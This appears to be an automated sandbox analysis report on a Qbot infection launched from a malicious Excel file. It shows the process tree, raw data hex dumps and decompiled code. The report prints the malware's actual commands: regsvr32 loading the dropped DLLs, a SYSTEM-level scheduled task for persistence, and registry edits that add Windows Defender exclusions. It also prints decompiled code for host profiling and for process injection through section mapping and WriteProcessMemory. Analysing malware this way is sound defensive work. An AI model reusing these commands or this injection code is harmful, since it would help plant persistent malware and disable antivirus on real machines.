Sep 28, 2021 22:14:50.548464060 CEST	10	IN	Data Raw: 43 00 00 75 16 ff 93 60 60 67 06 89 7d f0 29 ff 31 c7 89 bb 30 55 43 00 8b 7d f0 03 75 08 83 bb 7c 50 43 00 00 75 13 ff 93 60 60 67 06 50 8f 45 f0 ff 75 f0 8f 83 7c 50 43 00 53 89 f3 81 c3 02 00 00 00 89 de 5b 83 bb 70 52 43 00 00 75 13 ff 93 0c Data Ascii: Cu``g})10UC}u\|PCu``gPEu\|PCS[pRCu`gPEupRCM1eMMdSCu`gu+udSC1dSCu4UCud`gR1UCUCZTCu`gPEuTC6PC
Sep 28, 2021 22:14:50.548481941 CEST	11	IN	Data Raw: 00 00 33 04 e4 83 ec fc c9 c2 04 00 56 83 e6 00 33 b3 d4 55 43 00 83 e7 00 09 f7 5e ff 77 3c 8f 45 f8 ff 75 f8 58 8b 7c 38 28 03 bb 4c 54 43 00 57 8f 45 f8 ff 75 f8 5a 89 55 f8 29 d2 0b 93 4c 54 43 00 89 d7 8b 55 f8 6a 00 89 34 e4 29 f6 33 77 3c Data Ascii: 3V3UC^w<EuX\|8(LTCWEuZU)LTCUj4)3w<^\|8(LTC]3]11]d50Eu^vW3~_qEu_;uB]+]1a1Y]4E}EU);u,4E}
Sep 28, 2021 22:14:50.548500061 CEST	13	IN	Data Raw: 43 00 5e 83 bb d0 53 43 00 00 75 1a ff 93 60 60 67 06 57 33 3c e4 09 c7 83 a3 d0 53 43 00 00 31 bb d0 53 43 00 5f c7 45 f0 11 00 00 00 83 bb 0c 53 43 00 00 75 13 ff 93 0c 60 67 06 50 8f 45 e4 ff 75 e4 8f 83 0c 53 43 00 83 bb d4 50 43 00 00 0f 85 Data Ascii: C^SCu``gW3<SC1SC_ESCu`gPEuSCPC TCu`gM)1 TCM`gUCu P``gPEuUCE3E}11PC}DPCu``gQ31DPC1DPCYE@UCu`gj1
Sep 28, 2021 22:14:50.736383915 CEST	14	IN	Data Raw: 75 12 46 89 4d e0 31 c9 0b 4d e8 89 c8 8b 4d e0 0f b6 1c 30 53 33 1c e4 0b 5d f0 83 e2 00 31 da 5b d3 c2 23 d3 ac 0a c2 88 07 47 ff 4d f4 75 bd 29 db 8f 45 e4 33 5d e4 83 bb c0 50 43 00 00 75 16 ff 93 64 60 67 06 6a 00 89 3c e4 29 ff 31 c7 89 bb Data Ascii: uFM1MM0S3]1[#GMu)E3]PCud`gj<)1PC_W3}1_\QCu'Q``gR31\QC\QCZE3MF13USCu.QRd`gU1SCSCU)EUEMRC\RC

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3032 Parent PID: 596

General

Start time:	22:14:20
Start date:	28/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f5f0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 2592 Parent PID: 3032

General

Start time:	22:15:52
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd.red
Imagebase:	0xff880000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2540 Parent PID: 2592

General

Start time:	22:15:53
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-silent ..\Drezd.red
Imagebase:	0x700000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.616094137.00000000001E0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 448 Parent PID: 2540

General

Start time:	22:15:56
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x5d0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2032 Parent PID: 3032

General

Start time:	22:15:58
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd1.red
Imagebase:	0xff880000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 1840 Parent PID: 448

General

Start time:	22:15:58
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29
Imagebase:	0xdf0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2416 Parent PID: 3032

General

Start time:	22:15:58
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Drezd2.red
Imagebase:	0xff880000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 1584 Parent PID: 1672

General

Start time:	22:16:00
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Drezd.red'
Imagebase:	0xffdf0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2912 Parent PID: 1584

General

Start time:	22:16:00
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Drezd.red'
Imagebase:	0xc40000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.631006029.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: explorer.exe PID: 3068 Parent PID: 2912

General

Start time:	22:16:03
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x5d0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 3024 Parent PID: 3068

General

Start time:	22:16:05
Start date:	28/09/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'
Imagebase:	0xff7a0000
File size:	74752 bytes
MD5 hash:	9D0B3066FE3D1FD345E86BC7BCCED9E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: reg.exe PID: 1136 Parent PID: 3068

General

Start time:	22:16:06
Start date:	28/09/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0'
Imagebase:	0xffd40000
File size:	74752 bytes
MD5 hash:	9D0B3066FE3D1FD345E86BC7BCCED9E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 1636 Parent PID: 1672

General

Start time:	22:17:00
Start date:	28/09/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\Drezd.red'
Imagebase:	0xff600000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2044 Parent PID: 1636

General

Start time:	22:17:00
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\Drezd.red'
Imagebase:	0x910000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 2540 Parent PID: 2592 regsvr32.exeCOMMON

Executed Functions

Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x8abfaa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x8abfbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x8abfaa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x8abfaa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x8abfaa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x8abfaa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x8abfaa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x8abfaa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x8abfaa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x8abfaa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x8abfaa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x8abfaa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

0x1000d01f
0x1000d029
0x1000d035
0x1000d03a
0x1000d03f
0x1000d3ff
0x1000d3ff
0x1000d04c
0x1000d052
0x1000d057
0x1000d05d
0x1000d06d
0x1000d079
0x1000d079
0x1000d082
0x1000d088
0x1000d08a
0x1000d093
0x1000d093
0x1000d09f
0x1000d0a3
0x1000d0a8
0x1000d0ae
0x1000d0b7
0x1000d0c5
0x1000d0cc
0x1000d0d1
0x1000d0d1
0x1000d0d2
0x1000d0b9
0x1000d0b9
0x1000d0b9
0x1000d0d8
0x1000d0de
0x1000d0e3
0x1000d0e9
0x1000d0f1
0x1000d0fb
0x1000d108
0x1000d113
0x1000d11b
0x1000d13c
0x1000d13e
0x1000d13e
0x1000d140
0x1000d14a
0x1000d156
0x1000d166
0x1000d16c
0x1000d172
0x1000d174
0x1000d185
0x1000d18b
0x1000d191
0x1000d196
0x1000d19c
0x1000d1a2
0x1000d1a7
0x1000d1ac
0x1000d1ac
0x1000d1b2
0x1000d1b2
0x1000d1bb
0x1000d1c7
0x1000d1cf
0x1000d1d3
0x1000d1d3
0x1000d1cf
0x1000d1d7
0x1000d1dd
0x1000d1e3
0x1000d1ea
0x1000d1fb
0x1000d201
0x1000d209
0x1000d210
0x1000d212
0x1000d223
0x1000d229
0x1000d22e
0x1000d231
0x1000d234
0x1000d23a
0x1000d240
0x1000d242
0x1000d248
0x1000d251
0x1000d254
0x1000d254
0x1000d257
0x1000d25f
0x1000d26a
0x1000d270
0x1000d261
0x1000d263
0x1000d263
0x1000d279
0x1000d279
0x1000d27f
0x1000d287
0x1000d292
0x1000d297
0x1000d29d
0x1000d29f
0x1000d2ac
0x1000d2ad
0x1000d2ae
0x1000d2b9
0x1000d2bb
0x1000d2c2
0x1000d2c2
0x1000d2cc
0x1000d2d1
0x1000d2d6
0x1000d2d6
0x1000d2dc
0x1000d2e3
0x1000d2e4
0x1000d2f1
0x1000d304
0x1000d309
0x1000d30e
0x1000d317
0x1000d317
0x1000d31d
0x1000d322
0x1000d328
0x1000d32e
0x1000d333
0x1000d33c
0x1000d33e
0x1000d345
0x1000d345
0x1000d34b
0x1000d353
0x1000d358
0x1000d359
0x1000d35e
0x1000d367
0x1000d369
0x1000d374
0x1000d374
0x1000d37d
0x1000d385
0x1000d38c
0x1000d391
0x1000d3a0
0x1000d3b8
0x1000d3bf
0x1000d3cd
0x1000d3df
0x1000d3e6
0x1000d3ee
0x1000d3f3
0x00000000

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetCurrentProcessId.KERNEL32 ref: 1000D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
GetCurrentProcess.KERNEL32 ref: 1000D09F
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
GetLastError.KERNEL32 ref: 1000D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
GetLastError.KERNEL32 ref: 1000D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
GetCurrentProcess.KERNEL32 ref: 1000D20E

Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06

memset.MSVCRT ref: 1000D229
GetVersionExA.KERNEL32(00000000), ref: 1000D234
GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
GetSystemInfo.KERNEL32(?), ref: 1000D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287

Strings

%s\%s, xrefs: 1000D2F9
TEMP, xrefs: 1000D328, 1000D333, 1000D344
SystemDrive, xrefs: 1000D353, 1000D35E, 1000D373
USERPROFILE, xrefs: 1000D2E4, 1000D312
TEMP, xrefs: 1000D2F3

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1475707489-2706916422
Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x8a40590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x8abfbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x8a40590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

0x1000c6c6
0x1000c6cd
0x1000c6cf
0x1000c6d1
0x1000c6d3
0x1000c6d6
0x1000c6d9
0x1000c6dc
0x1000c6df
0x1000c6e2
0x1000c6e5
0x1000c6ef
0x1000c6f2
0x1000c6f9
0x1000c6fe
0x1000c6fe
0x1000c704
0x1000c706
0x1000c70f
0x1000c8b5
0x1000c8b9
0x1000c8be
0x1000c8c4
0x1000c8c7
0x1000c8c7
0x1000c8cb
0x1000c8d0
0x1000c8e2
0x1000c8e2
0x1000c8eb
0x1000c8f5
0x1000c8f5
0x1000c8fc
0x1000c8fc
0x1000c71e
0x1000c738
0x00000000
0x00000000
0x1000c743
0x1000c74d
0x1000c757
0x1000c75a
0x1000c760
0x1000c767
0x1000c768
0x1000c769
0x1000c772
0x1000c773
0x1000c774
0x1000c776
0x1000c779
0x1000c77c
0x1000c77f
0x1000c782
0x1000c78e
0x1000c7b0
0x1000c7b8
0x1000c7bb
0x1000c7c6
0x1000c7c6
0x1000c7b8
0x1000c7f1
0x1000c8b2
0x00000000
0x1000c7f7
0x1000c803
0x1000c818
0x00000000
0x00000000
0x1000c82e
0x1000c830
0x1000c837
0x00000000
0x00000000
0x1000c848
0x1000c85f
0x1000c86f
0x1000c87b
0x1000c880
0x1000c886
0x1000c896
0x1000c8a2
0x1000c8aa
0x00000000
0x1000c8aa

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
RegisterClassExA.USER32 ref: 1000C785
CreateWindowExA.USER32 ref: 1000C7B0
DestroyWindow.USER32 ref: 1000C7BB
UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
NtClose.NTDLL(00000000), ref: 1000C8F5

Strings

sadccdcdsasa, xrefs: 1000C73E
cdcdwqwqwq, xrefs: 1000C76A
0, xrefs: 1000C74D

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
